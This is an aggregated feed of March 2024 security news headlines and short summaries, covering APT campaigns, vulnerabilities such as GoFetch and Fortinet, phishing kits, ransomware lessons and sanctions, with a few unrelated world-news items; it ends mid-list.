          As long as there are people in need of financing, loan fraud will be a threat. 1. Loan fee (advance fee) fraud: probably the most common type of loan fraud, this usually involves a scammer posing as a legitimate lender. These schemes also involve enticing loan terms or even debt forgiveness, bogus assistance with loan repayment, fraudulent promises to cut monthly payments, consolidate multiple student loans into a more manageable “package”, or negotiate with lenders on behalf of borrowers – in exchange for upfront fees for these “services”.


          20 essential open-source cybersecurity tools that save you time

          ciber
          2024-03-25 https://www.helpnetsecurity.com/2024/03/25/essential-open-source-cybersecurity-tools/

          Open-source software’s adaptive nature ensures its durability, relevance, and compatibility with new technologies. When I started digging deeper into the open-source cybersecurity ecosystem, I discovered an engaged community of developers working to find practical solutions to many problems, one of them being saving time. Here are 20 essential open-source cybersecurity tools that are freely available and waiting for you to include them in your arsenal. Adalanche: Adalanche provides immediate insights into the permissions of users … More

          The post 20 essential open-source cybersecurity tools that save you time appeared first on Help Net Security.


          Autosummary: Prowler: Prowler is an open-source security tool designed to assess, audit, and enhance the security of AWS, GCP, and Azure. Lynis: Lynis is a comprehensive open-source security auditing tool for UNIX-based systems, including Linux, macOS, and BSD. Mobile Security Framework (MobSF): MobSF is an open-source research platform for mobile application security, encompassing Android, iOS, and Windows Mobile.


          8 cybersecurity predictions shaping the future of cyber defense

          ciber
          2024-03-25 https://www.helpnetsecurity.com/2024/03/25/cybersecurity-leaders-strategic-planning/

          Among Gartner’s top predictions are the collapse of the cybersecurity skills gap and the reduction of employee-driven cybersecurity incidents through the adoption of generative AI (GenAI). Two-thirds of global 100 organizations are expected to extend directors’ and officers’ insurance to cybersecurity leaders due to personal legal exposure. Furthermore, battling malinformation is projected to cost enterprises more than $500 billion. “As we start moving beyond what’s possible with GenAI, solid opportunities are emerging to help solve … More

          The post 8 cybersecurity predictions shaping the future of cyber defense appeared first on Help Net Security.


          Autosummary: The combination of AI, analytics, behavioral science, social media, Internet of Things and other technologies enables bad actors to create and spread highly effective, mass-customized malinformation (or misinformation). “To bridge the gap, cybersecurity functions must build minimum effective expertise in these teams, using a combination of technology and training to generate only as much competence as is required to make cyber risk informed decisions autonomously,” Gopal concluded.


          Scams are becoming more convincing and costly

          financial
          2024-03-25 https://www.helpnetsecurity.com/2024/03/25/scams-volume-increase/

          Scams directly targeting consumers continue to increase in both complexity and volume, according to Visa. Consumers are increasingly targeted by scammers, who rely on heightened emotions to create fraud opportunities. While the number of individual scam reports from June to December decreased, the total money lost increased, indicating scammers are targeting victims with more effective – and costly – scams. According to another Visa survey, more than one-third of adults surveyed decided not to report … More

          The post Scams are becoming more convincing and costly appeared first on Help Net Security.


          Autosummary: “With the use of generative AI and other emerging technologies, scams are more convincing than ever, leading to unprecedented losses for consumers,” said Paul Fabara, Chief Risk and Client Services Officer, Visa.


          Cybercriminals use ChatGPT’s prompts as weapons

          ciber
          2024-03-25 https://www.helpnetsecurity.com/2024/03/25/chatgpt-cybersecurity-implications-video/

          Developed by OpenAI, ChatGPT has garnered attention across industries for its ability to generate relevant responses to various queries. However, as the adoption of ChatGPT accelerates, so do discussions surrounding its ethical and security implications. Organizations grapple with questions about data privacy, content moderation, and potential misuse. In this round-up from Help Net Security, cybersecurity experts discuss various aspects of ChatGPT and its implications for cybersecurity. Complete videos Rodman Ramezanian, Global Cloud Threat Lead at … More

          The post Cybercriminals use ChatGPT’s prompts as weapons appeared first on Help Net Security.




          APT29 hit German political parties with bogus invites and malware

          exploits
          2024-03-25 https://www.helpnetsecurity.com/2024/03/25/apt29-german-political-parties/

          APT29 (aka Cozy Bear, aka Midnight Blizzard) has been spotted targeting German political parties for the first time, Mandiant researchers have shared. Phishing leading to malware: the attack started in late February 2024, with phishing emails containing bogus invitations to a dinner reception, ostensibly sent by the Christian Democratic Union (CDU), a major political party in Germany. Recipients were urged to follow a link to discover “all the necessary information about the event as well … More

          The post APT29 hit German political parties with bogus invites and malware appeared first on Help Net Security.




          New "GoFetch" Vulnerability in Apple M-Series Chips Leaks Secret Encryption Keys

          exploits
          2024-03-25 https://thehackernews.com/2024/03/new-gofetch-vulnerability-in-apple-m.html
          A new security shortcoming discovered in Apple M-series chips could be exploited to extract secret keys used during cryptographic operations. Dubbed GoFetch, the vulnerability relates to a microarchitectural side-channel attack that takes advantage of a feature known as data memory-dependent prefetcher (DMP) to target constant-time cryptographic implementations and capture sensitive data

          Autosummary: "DMP activates (and attempts to dereference) data loaded from memory that 'looks like' a pointer," a team of seven academics from the University of Illinois Urbana-Champaign, University of Texas, Georgia Institute of Technology, University of California, Berkeley, University of Washington, and Carnegie Mellon University said. GoFetch, in a nutshell, demonstrates that "even if a victim correctly separates data from addresses by following the constant-time paradigm, the DMP will generate secret-dependent memory access on the victim's behalf," rendering it susceptible to key-extraction attacks.


          Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks

          financial
          2024-03-25 https://thehackernews.com/2024/03/iran-linked-muddywater-deploys-atera.html
          The Iran-affiliated threat actor tracked as MuddyWater (aka Mango Sandstorm or TA450) has been linked to a new phishing campaign in March 2024 that aims to deliver a legitimate Remote Monitoring and Management (RMM) solution called Atera. The activity, which took place from March 7 through the week of March 11, targeted Israeli entities spanning global manufacturing, technology, and

          Autosummary: The activity, which took place from March 7 through the week of March 11, targeted Israeli entities spanning global manufacturing, technology, and information security sectors, Proofpoint said.


          Ransomware: lessons all companies can learn from the British Library attack

          exploits
          2024-03-25 https://www.exponential-e.com/blog/ransomware-lessons-all-companies-can-learn-from-the-british-library-attack
          In October 2023, the British Library suffered "one of the worst cyber incidents in British history," as described by Ciaran Martin, ex-CEO of the National Cyber Security Centre (NCSC). What lessons can other organisations learn from the ransomware attack? Read more in my article on the Exponential-e blog.



          Scammers steal millions from FTX, BlockFi claimants

          financial
          2024-03-25 https://www.helpnetsecurity.com/2024/03/25/blockfi-ftx-phishing/

          Customers of bankrupt crypto platform BlockFi have been targeted with a very convincing phishing email impersonating the platform, asking them to connect their wallet to complete the withdrawal of remaining funds. Judging by this Reddit thread, many have fallen for the scam and have had their cryptowallet emptied. Web3 security consultant and threat researcher Plumferno says the scammers pilfered millions in just five days. The latest BlockFi phishing campaign BlockFi was a digital asset lender … More

          The post Scammers steal millions from FTX, BlockFi claimants appeared first on Help Net Security.


          Autosummary: They advise customers to be extra vigilant of email scams and to be wary of non-standard communication attempts (e.g., via phone calls, text messages, or social media).


          US win over Mexico marred by discriminatory chanting

          latam
          2024-03-25 https://www.bbc.co.uk/sport/football/68653786
          The United States beat Mexico to claim the Concacaf Nations League title in a game that was halted three times because of homophobic chanting.

          Autosummary: "It is extremely disappointing that this matter continues to be an issue at some matches, particularly in the context of the next two years presenting such a tremendous opportunity to grow the sport in our region," Concacaf said.


          New MFA-bypassing phishing kit targets Microsoft 365, Gmail accounts

          financial
          2024-03-25 https://www.bleepingcomputer.com/news/security/new-mfa-bypassing-phishing-kit-targets-microsoft-365-gmail-accounts/
          Cybercriminals have been increasingly using a new phishing-as-a-service (PhaaS) platform named "Tycoon 2FA" to target Microsoft 365 and Gmail accounts and bypass two-factor authentication (2FA) protection. [...]

          Autosummary: [Figure: Tycoon 2FA attack overview (Sekoia)] Evolution and scale: Sekoia reports that the latest version of the Tycoon 2FA phishing kit, released this year, has introduced significant modifications that improve its phishing and evasion capabilities. [Figure: Tycoon 2FA website (Sekoia)] Tycoon 2FA attacks: Tycoon 2FA attacks involve a multi-step process in which the threat actor steals session cookies by using a reverse proxy server hosting the phishing web page, which intercepts the victim's input and relays it to the legitimate service.


          Google's new AI search results promotes sites pushing malware, scams

          financial exploits
          2024-03-25 https://www.bleepingcomputer.com/news/google/googles-new-ai-search-results-promotes-sites-pushing-malware-scams/
          Google's new AI-powered "Search Generative Experience" algorithms recommend scam sites that redirect visitors to unwanted Chrome extensions, fake iPhone giveaways, browser spam subscriptions, and tech support scams. [...]

          Autosummary: [Figure: Browser notification spam promoting affiliate scams. Source: BleepingComputer] In one instance, we received an alert for McAfee antivirus that led to a site claiming our system was infected with ten viruses, urging the visitor to "Scan now to remove viruses" or renew their license. Earlier this month, Google began rolling out a new feature called Google Search Generative Experience (SGE) in its search results, which provides AI-generated quick summaries for search queries, including recommendations for other sites to visit related to the query.


          3 important lessons from a devastating ransomware attack

          exploits ransomware
          2024-03-25 https://www.malwarebytes.com/blog/ransomware/2024/03/3-important-lessons-from-a-devastating-ransomware-attack
Three things you could learn from the cyber incident review produced by the British Library following its October ransomware attack.

Autosummary: As important as monitoring technologies like SIEM, EDR and MDR have become, it remains as true today as it ever has that every endpoint and server, whether they’re Windows, Macs, or Linux machines, needs a next-gen antivirus engine that can detect and stop known threats and block suspicious behaviour, such as malicious encryption. The library, a vast repository of over 170 million items, is still deep in the recovery process, but recently released an eighteen-page cyber incident review describing the attack, its impact, the aftermath, and the lessons learned.


          US sanctions crypto exchanges used by Russian darknet market, banks

          financial rusia-ucrania
          2024-03-25 https://www.bleepingcomputer.com/news/security/us-sanctions-crypto-exchanges-used-by-russian-darknet-market-banks/
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned three cryptocurrency exchanges for working with OFAC-designated Russian dark web markets and banks. [...]

Autosummary: OFAC also designated multiple other Russian fintech companies and their owners for working with OFAC-designated Rosbank, VTB Bank, Sberbank, Sovcombank, and the Central Bank of Russia to help Russian companies and nationals evade sanctions.


          CISA adds FortiClient EMS, Ivanti EPM CSA, Nice Linear eMerge E3-Series bugs to its Known Exploited Vulnerabilities catalog

          exploits
          2024-03-25 https://securityaffairs.com/161057/security/cisa-adds-forticlient-ems-ivanti-epm-csa-nice-linear-emerge-e3-series-bugs-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds FortiClient EMS, Ivanti EPM CSA, Nice Linear eMerge E3-Series bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2023-48788 (CVSS score 9.3) is a critical pervasive SQL injection issue that resides […]

Autosummary: CVE-2023-48788 Fortinet FortiClient EMS SQL Injection Vulnerability; CVE-2021-44529 Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) Code Injection Vulnerability; CVE-2019-7256 Nice Linear eMerge E3-Series OS Command Injection Vulnerability. CVE-2023-48788 (CVSS score 9.3) is a critical pervasive SQL injection issue that resides in the DAS component.


          Vans warns customers of data breach

          financial
          2024-03-25 https://www.malwarebytes.com/blog/news/2024/03/vans-warns-customers-of-data-breach
Vans warns its customers about phishing and other fraud attacks in the aftermath of a ransomware attack in December.

Autosummary: The affected information could include: email address, full name, phone number, billing address, and shipping address. In certain cases, the affected data may also include order history, total order value, and information about the payment method used for the purchases. Vans notes that the payment method does not specify details like account number, just the method described as “credit card”, “Paypal”, or “bank account payment”, with no additional details attached. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.


          Cybersecurity starts at home: Help your children stay safe online with open conversations

          ciber
          2024-03-25 https://www.welivesecurity.com/en/kids-online/cybersecurity-starts-home-children-open-conversations/
Struggle to know how to help children and teens stay safe in cyberspace? A good ol’ fashioned chat is enough to put them on the right track.

Autosummary: Engage in open conversations to educate your children about the potential risks and equip them with strategies for navigating them safely: teach kids how to critically evaluate online information and make conscious decisions on whether it’s real or fake; show them how to recognize and report cyberbullying; go through the tools they can use to protect their personal information, such as two-factor authentication and a password manager, and, if needed, help them set those up properly. Chances are, younger children might be most interested in the games they can play on their devices. In today’s digital age, the internet plays a major role in young people’s lives, influencing how they further grow and develop into fully-fledged adults venturing out into the real world: from educational resources to social connections, discovering the latest viral dance trends, or watching how-to videos on how to cook pasta, the online world offers endless possibilities and resources. Cyberbullying, sexual predators, privacy invasions, malware, as well as phishing and other scams – all at least partly caused by ineffective or non-existent privacy and cybersecurity awareness and precautions – can detrimentally impact not only young people’s online safety, but their offline well-being too. 4. Stay ahead of emerging risks: the digital landscape is constantly evolving, with new apps, trends, and online threats emerging regularly.


          Week in review: Ivanti fixes RCE vulnerability, Nissan breach affects 100,000 individuals

          exploits
          2024-03-24 https://www.helpnetsecurity.com/2024/03/24/week-in-review-ivanti-fixes-rce-vulnerability-nissan-breach-affects-100000-individuals/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Outsmarting cybercriminal innovation with strategies for enterprise resilience In this Help Net Security interview, Pedro Cameirão, Head of Cyber Defense Center at Nokia, discusses emerging cybersecurity trends for 2024 and advises enterprises on preparation strategies. Cybersecurity jobs available right now: March 19, 2024 We’ve scoured the market to bring you a selection of roles that span various skill levels within … More


Autosummary: New infosec products of the week: March 22, 2024. Here’s a look at the most interesting products from the past week, featuring releases from Appdome, Drata, GlobalSign, Ordr, Portnox, Sonatype, Tufin, and Zoom. Security best practices for GRC teams: in this Help Net Security video, Shrav Mehta, CEO at Secureframe, talks about security best practices for GRC teams, highlights areas that security learners should pay close attention to, and discusses how security leaders can automate specific processes.


          N. Korea-linked Kimsuky Shifts to Compiled HTML Help Files in Ongoing Cyberattacks

          ciber
          2024-03-24 https://thehackernews.com/2024/03/n-korea-linked-kimsuky-shifts-to.html
The North Korea-linked threat actor known as Kimsuky (aka Black Banshee, Emerald Sleet, or Springtail) has been observed shifting its tactics, leveraging Compiled HTML Help (CHM) files as vectors to deliver malware for harvesting sensitive data. Kimsuky, active since at least 2012, is known to target entities located in South Korea as well as North America, Asia, and Europe. According

Autosummary: "While originally designed for help documentation, CHM files have also been exploited for malicious purposes, such as distributing malware, because they can execute JavaScript when opened," the company said.


          Cybercriminals Accelerate Online Scams During Ramadan and Eid Fitr

          financial ciber
          2024-03-24 https://securityaffairs.com/161009/cyber-crime/cybercriminals-accelerate-scams-ramadan.html
During the month of Ramadan, Resecurity observed a significant increase in fraudulent activities and scams, coinciding with a surge in retail and online transactions. Middle Eastern enterprises, facing this heightened risk, are urged to bolster consumer protection and reinforce their […]


          Over 100 US and EU orgs targeted in StrelaStealer malware attacks

          exploits
          2024-03-24 https://www.bleepingcomputer.com/news/security/over-100-us-and-eu-orgs-targeted-in-strelastealer-malware-attacks/
A new large-scale StrelaStealer malware campaign has impacted over a hundred organizations across the United States and Europe, attempting to steal email account credentials. [...]

Autosummary: Invoice-themed email written in German (Unit42). Most targeted entities operate in the "high tech" space, followed by sectors like finance, legal services, manufacturing, government, utilities and energy, insurance, and construction.


          Russian Hackers Use "WINELOADER" Malware to Target German Political Parties

          exploits rusia-ucrania
          2024-03-23 https://thehackernews.com/2024/03/russian-hackers-use-wineloader-malware.html
The WINELOADER backdoor used in recent cyber attacks targeting diplomatic entities with wine-tasting phishing lures has been attributed as the handiwork of a hacking group with links to Russia's Foreign Intelligence Service (SVR), which was responsible for breaching SolarWinds and Microsoft. The findings come from Mandiant, which said Midnight Blizzard (aka APT29, BlueBravo, or

Autosummary: WINELOADER, per the Google Cloud subsidiary, has also been employed in an operation targeting diplomatic entities in the Czech Republic, Germany, India, Italy, Latvia, and Peru in late January 2024.


          Large-scale Sign1 malware campaign already infected 39,000+ WordPress sites

          exploits
          2024-03-23 https://securityaffairs.com/160942/hacking/sign1-malware-campaign.html
A large-scale malware campaign, tracked as Sign1, has already compromised 39,000 WordPress sites in the last six months. Security researchers at Sucuri spotted the Sign1 campaign and discovered that threat actors compromised the websites by implanting malicious JavaScript injections that […]

Autosummary: Pierluigi Paganini, March 23, 2024. A large-scale malware campaign, tracked as Sign1, has already compromised 39,000 WordPress sites in the last six months.


          Microsoft to shut down 50 cloud services for Russian businesses

          rusia-ucrania
          2024-03-23 https://www.bleepingcomputer.com/news/microsoft/microsoft-to-shut-down-50-cloud-services-for-russian-businesses/
Microsoft plans to limit access to over fifty cloud products for Russian organizations by the end of March as part of the sanctions requirements against the country issued by EU regulators last December. [...]

Autosummary: It has been clarified that the invalidation of licenses impacts Russian companies and organizations engaging in architecture, design, construction, manufacturing, media, education and entertainment, building information modeling (BIM), computer-aided design (CAD), and computer-aided manufacturing (CAM). "As you may know, the European Union recently imposed new economic sanctions that, effective March 20, 2024, prohibit Microsoft from supplying certain management or design software (including cloud-based solutions) to entities incorporated in Russia." Some of the most important products that will have their license keys invalidated are: Microsoft Azure: cloud platform for computing, analytics, storage, and networking services.


          Mozilla fixed Firefox zero-days exploited at Pwn2Own Vancouver 2024

          exploits
          2024-03-23 https://securityaffairs.com/160966/hacking/mozilla-fixed-firefox-zero-day-pwn2own-vancouver-2024.html
Mozilla addressed two Firefox zero-day vulnerabilities exploited during the Pwn2Own Vancouver 2024 hacking competition. Mozilla has done an amazing job addressing two zero-day vulnerabilities in the Firefox web browser exploited during the recent Pwn2Own Vancouver 2024 hacking competition. The researcher Manfred Paul (@_manfp), who won the competition, exploited the two vulnerabilities, respectively tracked as CVE-2024-29944 and […]

Autosummary: Pierluigi Paganini, March 23, 2024. Mozilla addressed two Firefox zero-day vulnerabilities exploited during the Pwn2Own Vancouver 2024 hacking competition.


          Robinho arrested in Brazil to serve rape sentence

          latam
          2024-03-22 https://www.bbc.co.uk/news/world-latin-america-68632912
The former Brazil international was convicted in Italy for his part in a gang rape in 2013.


          Hackers earn $1,132,500 for 29 zero-days at Pwn2Own Vancouver

          exploits
          2024-03-22 https://www.bleepingcomputer.com/news/security/hackers-earn-1-132-500-for-29-zero-days-at-pwn2own-vancouver/
Pwn2Own Vancouver 2024 has ended with security researchers collecting $1,132,500 after demoing 29 zero-days (and some bug collisions). [...]


          Shadow AI is the latest cybersecurity threat you need to prepare for

          ciber
          2024-03-22 https://www.helpnetsecurity.com/2024/03/22/shadow-ai-risks/

Shadow IT – the use of software, hardware, systems and services that haven’t been approved by an organization’s IT/IT Sec departments – has been a problem for the last couple of decades, and a difficult area for IT leaders to manage effectively. Similarly to shadow IT, shadow AI refers to all the AI-enabled products and platforms being used within your organization that those departments don’t know about. While personal use of AI applications can be … More


Autosummary: 2. Build an acceptable use policy: once your AI use has been classified, an acceptable use policy for your entire organization needs to be laid out to ensure all employees know exactly what they can and cannot do when interacting with the approved AI-enabled applications. 1) Inputting data or content into these applications can put intellectual property at risk; 2) as the number of AI-enabled applications increases, the chance of misuse also increases, with aspects like data governance and regulations such as GDPR being key considerations; 3) there is reputational risk related to unchecked AI output.


          Russian Hackers Target Ukrainian Telecoms with Upgraded "AcidPour" Malware

          exploits rusia-ucrania Telcos
          2024-03-22 https://thehackernews.com/2024/03/russian-hackers-target-ukrainian.html
The data wiping malware called AcidPour may have been deployed in attacks targeting four telecom providers in Ukraine, new findings from SentinelOne show. The cybersecurity firm also confirmed connections between the malware and AcidRain, tying it to threat activity clusters associated with Russian military intelligence. "AcidPour's expanded capabilities would enable it to better

Autosummary: "AcidPour's expanded capabilities would enable it to better disable embedded devices including networking, IoT, large storage (RAIDs), and possibly ICS devices running Linux x86 distributions," security researchers Juan Andres Guerrero-Saade and Tom Hegel said.


          Attackers are targeting financial departments with SmokeLoader malware

          financial exploits
          2024-03-22 https://www.helpnetsecurity.com/2024/03/22/smokeloader-phishing/

Financially motivated hackers have been leveraging SmokeLoader malware in a series of phishing campaigns predominantly targeting Ukrainian government and administration organizations. The phishing campaign: the Ukrainian SSSCIP State Cyber Protection Center (SCPC), together with the Palo Alto Networks Unit 42 research team, has been tracking a massive phishing campaign linked to the distribution of the SmokeLoader malware. The researchers specifically analyzed 23 phishing campaigns spanning May to November 2023. During these short but massive … More


Autosummary: It has been updated and modified over the years to follow technological advances and evolve its detection evasion techniques, such as “sandbox detection, obfuscated code using opaque predicates, encrypted function blocks, anti-debugging, anti-hooking, anti-vm, and custom imports.”


          CISA: Here’s how you can foil DDoS attacks

          industry
          2024-03-22 https://www.helpnetsecurity.com/2024/03/22/guidance-ddos-attacks/

In light of the rise of “DDoS hacktivism” and the recent DDoS attacks aimed at disrupting French and Alabama government websites, the Cybersecurity and Infrastructure Security Agency (CISA) has updated its guidance on how governmental entities (but also other organizations) should respond to this type of attack. DDoS attacks explained: first and foremost, the document explains the main difference between a DoS attack (from a single source) and a DDoS attack (from multiple sources). “The … More



          AWS Patches Critical "FlowFixation" Bug in Airflow Service to Prevent Session Hijacking

          exploits
          2024-03-22 https://thehackernews.com/2024/03/aws-patches-critical-flowfixation-bug.html
Cybersecurity researchers have shared details of a now-patched security vulnerability in Amazon Web Services (AWS) Managed Workflows for Apache Airflow (MWAA) that could be potentially exploited by a malicious actor to hijack victims' sessions and achieve remote code execution on underlying instances. The vulnerability, now addressed by AWS, has been codenamed FlowFixation by Tenable.

Autosummary: Tenable also pointed out that the shared architecture – where several customers have the same parent domain – could be a goldmine for attackers looking to exploit vulnerabilities like same-site attacks, cross-origin issues, and cookie tossing, effectively leading to unauthorized access, data leaks, and code execution.


          Massive Sign1 Campaign Infects 39,000+ WordPress Sites with Scam Redirects

          financial
          2024-03-22 https://thehackernews.com/2024/03/massive-sign1-campaign-infects-39000.html
A massive malware campaign dubbed Sign1 has compromised over 39,000 WordPress sites in the last six months, using malicious JavaScript injections to redirect users to scam sites. The most recent variant of the malware is estimated to have infected no less than 2,500 sites over the past two months alone, Sucuri said in a report published this week. The attacks entail injecting rogue


          Nationwide payments to banks delayed by IT glitch

          financial
          2024-03-22 https://www.bbc.co.uk/news/technology-68635180
The building society says the problem has now been resolved but there is a payment backlog.


          Mozilla fixes two Firefox zero-day bugs exploited at Pwn2Own

          exploits
          2024-03-22 https://www.bleepingcomputer.com/news/security/mozilla-fixes-two-firefox-zero-day-bugs-exploited-at-pwn2own/
Mozilla has released security updates to fix two zero-day vulnerabilities in the Firefox web browser exploited during the Pwn2Own Vancouver 2024 hacking competition. [...]


          New StrelaStealer Phishing Attacks Hit Over 100 Organizations in E.U. and U.S.

          financial
          2024-03-22 https://thehackernews.com/2024/03/new-strelastealer-phishing-attacks-hit.html
Cybersecurity researchers have detected a new wave of phishing attacks that aim to deliver an ever-evolving information stealer referred to as StrelaStealer. The campaigns impact more than 100 organizations in the E.U. and the U.S., Palo Alto Networks Unit 42 researchers said in a new report published today. "These campaigns come in the form of spam emails with attachments that eventually

Autosummary: Since then, two large-scale campaigns involving the malware have been detected in November 2023 and January 2024 targeting high tech, finance, professional and legal, manufacturing, government, energy, insurance, and construction sectors in the E.U. and the U.S. These attacks also aim to deliver a new variant of the stealer that packs in better obfuscation and anti-analysis techniques, while being propagated via invoice-themed emails bearing ZIP attachments, marking a shift from ISO files.


          Russian hackers target German political parties with WineLoader malware

          exploits rusia-ucrania
          2024-03-22 https://www.bleepingcomputer.com/news/security/russian-hackers-target-german-political-parties-with-wineloader-malware/
Researchers are warning that a notorious hacking group linked to Russia's Foreign Intelligence Service (SVR) is targeting political parties in Germany for the first time, shifting their focus away from the typical targeting of diplomatic missions. [...]

Autosummary: The WineLoader backdoor features several similarities with other malware variants deployed in past APT29 attacks, such as "burnbatter", "myskybeat", and "beatdrop," suggesting a common developer.


          Smashing Security podcast #364: Bing pop-up wars, and the British Library ransomware scandal

          exploits ransomware
          2024-03-21 https://grahamcluley.com/smashing-security-podcast-364/
There's a Bing ding dong, after Microsoft (over?) enthusiastically encourages Chrome users to stop using Google, and silence hits the British Library as it shares its story of a ransomware attack. All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault. Plus: Don't miss our featured interview with Kolide founder Jason Meller about his firm's acquisition by 1Password.

Autosummary: Hosts: Graham Cluley – @gcluley; Carole Theriault – @caroletheriault. Episode links. Sponsored by: Kiteworks – Step into the future of secure managed file transfer with Kiteworks.


          WebCopilot: Open-source automation tool enumerates subdomains, detects bugs

          exploits
          2024-03-21 https://www.helpnetsecurity.com/2024/03/21/webcopilot-open-source-automation-tool/

          WebCopilot is an open-source automation tool that enumerates a target’s subdomains and discovers bugs using various free tools. It simplifies the application security workflow and reduces reliance on manual scripting. “I built this solution to streamline the application security process, specifically the repetitive tasks involved in reconnaissance. It consolidates several popular open-source tools into a single script, saving time and effort,” Harshit Raj Singh, the creator of WebCopilot, told Help Net Security. WebCopilot automates tasks … More


Autosummary: It consolidates several popular open-source tools into a single script, saving time and effort,” Harshit Raj Singh, the creator of WebCopilot, told Help Net Security.


          Malware stands out as the fastest-growing threat of 2024

          exploits
          2024-03-21 https://www.helpnetsecurity.com/2024/03/21/security-threats-severity-and-volume-rise/

          93% of IT professionals believe security threats are increasing in volume or severity, a significant rise from 47% last year, according to Thales. The number of enterprises experiencing ransomware attacks surged by over 27% in the past year. Despite this escalating threat, less than half of organizations have a formal ransomware plan in place, with 8% resorting to paying the ransom demands. Human error persists as major data breach factor Malware stands out as the … More


Autosummary: That said, enterprises are also looking at the opportunities that emerging technologies bring, with 22% planning to integrate generative AI into their security products and services in the next 12 months, and 33% planning to experiment with integrating the technology.


          Ivanti Releases Urgent Fix for Critical Sentry RCE Vulnerability

          exploits
          2024-03-21 https://thehackernews.com/2024/03/ivanti-releases-urgent-fix-for-critical.html
Ivanti has disclosed details of a critical remote code execution flaw impacting Standalone Sentry, urging customers to apply the fixes immediately to stay protected against potential cyber threats. Tracked as CVE-2023-41724, the vulnerability carries a CVSS score of 9.6. "An unauthenticated threat actor can execute arbitrary commands on the underlying operating system of the appliance


          Atlassian Releases Fixes for Over 2 Dozen Flaws, Including Critical Bamboo Bug

          exploits
          2024-03-21 https://thehackernews.com/2024/03/atlassian-releases-fixes-for-over-2.html
Atlassian has released patches for more than two dozen security flaws, including a critical bug impacting Bamboo Data Center and Server that could be exploited without requiring user interaction. Tracked as CVE-2024-1597, the vulnerability carries a CVSS score of 10.0, indicating maximum severity. Described as an SQL injection flaw, it's rooted in a dependency called org.postgresql:


          Presidential furniture row takes new turn in Brazil

          latam
          2024-03-21 https://www.bbc.co.uk/news/world-latin-america-68622674
Hundreds of items said to have been removed by the previous president are found still in the palace.


          Windows 11, Tesla, and Ubuntu Linux hacked at Pwn2Own Vancouver

          Linux
          2024-03-21 https://www.bleepingcomputer.com/news/security/windows-11-tesla-and-ubuntu-linux-hacked-at-pwn2own-vancouver/
On the first day of Pwn2Own Vancouver 2024, contestants demoed Windows 11, Tesla, and Ubuntu Linux zero-day vulnerabilities and exploit chains to win $732,500 and a Tesla Model 3 car. [...]

Autosummary: During last year's Vancouver Pwn2Own, won by Team Synacktiv, hackers earned $1,035,000 and a Tesla car for 27 zero-days (and several bug collisions) in Windows 11, Microsoft Teams, Microsoft SharePoint, macOS, Ubuntu Desktop, VMware Workstation, Oracle VirtualBox, and Tesla's Model 3.


          Fake data breaches: Countering the damage

          financial
          2024-03-21 https://www.helpnetsecurity.com/2024/03/21/fake-data-breaches/

          Amid the constant drumbeat of successful cyberattacks, some fake data breaches have also cropped up to make sensational headlines. Unfortunately, even fake data breaches can have real repercussions. Earlier this year, a hacker on a criminal forum claimed to have stolen data on some 50 million Europcar customers. After investigation, the car rental company determined that the data claimed to have been stolen was completely bogus. In February 2024, someone created a fake news story … More


Autosummary: Why fake data breaches matter: fake data breaches can hurt an organization’s security reputation, even if it quickly debunks the fake breach. 2. Have a clear communication plan: to avoid a situation like the one the Maine Attorney General’s office found themselves in, it’s important for organizations to have a plan in place for a suspected data breach.


          U.S. Sanctions Russians Behind "Doppelganger" Cyber Influence Campaign

          rusia-ucrania
          2024-03-21 https://thehackernews.com/2024/03/us-sanctions-russians-behind.html
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sanctions against two 46-year-old Russian nationals and the respective companies they own for engaging in cyber influence operations. Ilya Andreevich Gambashidze (Gambashidze), the founder of the Moscow-based company Social Design Agency (SDA), and Nikolai Aleksandrovich Tupikin (Tupikin), the CEO and

Autosummary: Ilya Andreevich Gambashidze (Gambashidze), the founder of the Moscow-based company Social Design Agency (SDA), and Nikolai Aleksandrovich Tupikin (Tupikin), the CEO and current owner of Russia-based Company Group Structura LLC (Structura), have been accused of providing services to the Russian government in connection to a "foreign malign influence campaign."


          Fears of hunger as Haiti turmoil spreads

          industry
          2024-03-21 https://www.bbc.co.uk/news/world-latin-america-68622814
Millions are caught in a perfect storm of politics, violence and homelessness, reports the BBC's Will Grant.


          Attackers are exploiting JetBrains TeamCity flaw to deliver a variety of malware

          exploits government
          2024-03-21 https://www.helpnetsecurity.com/2024/03/21/exploiting-cve-2024-27198/

Attackers are exploiting the recently patched JetBrains TeamCity auth bypass vulnerability (CVE-2024-27198) to deliver ransomware, cryptominers and remote access trojans (RATs), according to Trend Micro researchers. The CVE-2024-27198 timeline: CVE-2024-27198, an authentication bypass vulnerability affecting the TeamCity server, was disclosed and fixed in early March, along with CVE-2024-27199 – a directory traversal vulnerability in the same product. Several proof-of-concept (PoC) exploits have since been published, and analysts started seeing massive exploitation of CVE-2024-27198 soon … More



          AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials

          exploits
          2024-03-21 https://thehackernews.com/2024/03/androxgh0st-malware-targets-laravel.html
Cybersecurity researchers have shed light on a tool referred to as AndroxGh0st that's used to target Laravel applications and steal sensitive data. "It works by scanning and taking out important information from .env files, revealing login details linked to AWS and Twilio," Juniper Threat Labs researcher Kashinath T Pattan said. "Classified as an SMTP cracker, it exploits SMTP

Autosummary: A majority of the attack attempts targeting its honeypot infrastructure originated from the U.S., U.K., China, the Netherlands, Germany, Bulgaria, Kuwait, Russia, Estonia, and India, it added.


          Evasive Sign1 malware campaign infects 39,000 WordPress sites

          exploits
          2024-03-21 https://www.bleepingcomputer.com/news/security/evasive-sign1-malware-campaign-infects-39-000-wordpress-sites/
          A previously unknown malware campaign called Sign1 has infected over 39,000 websites over the past six months, causing visitors to see unwanted redirects and popup ads. [...]

          Autosummary: Daily downloads (Source: Sucuri). In the past six months, Sucuri's scanners detected the malware on over 39,000 websites, while the latest attack wave, which has been underway since January 2024, has claimed 2,500 sites.


          Exploit released for Fortinet RCE bug used in attacks, patch now

          exploits
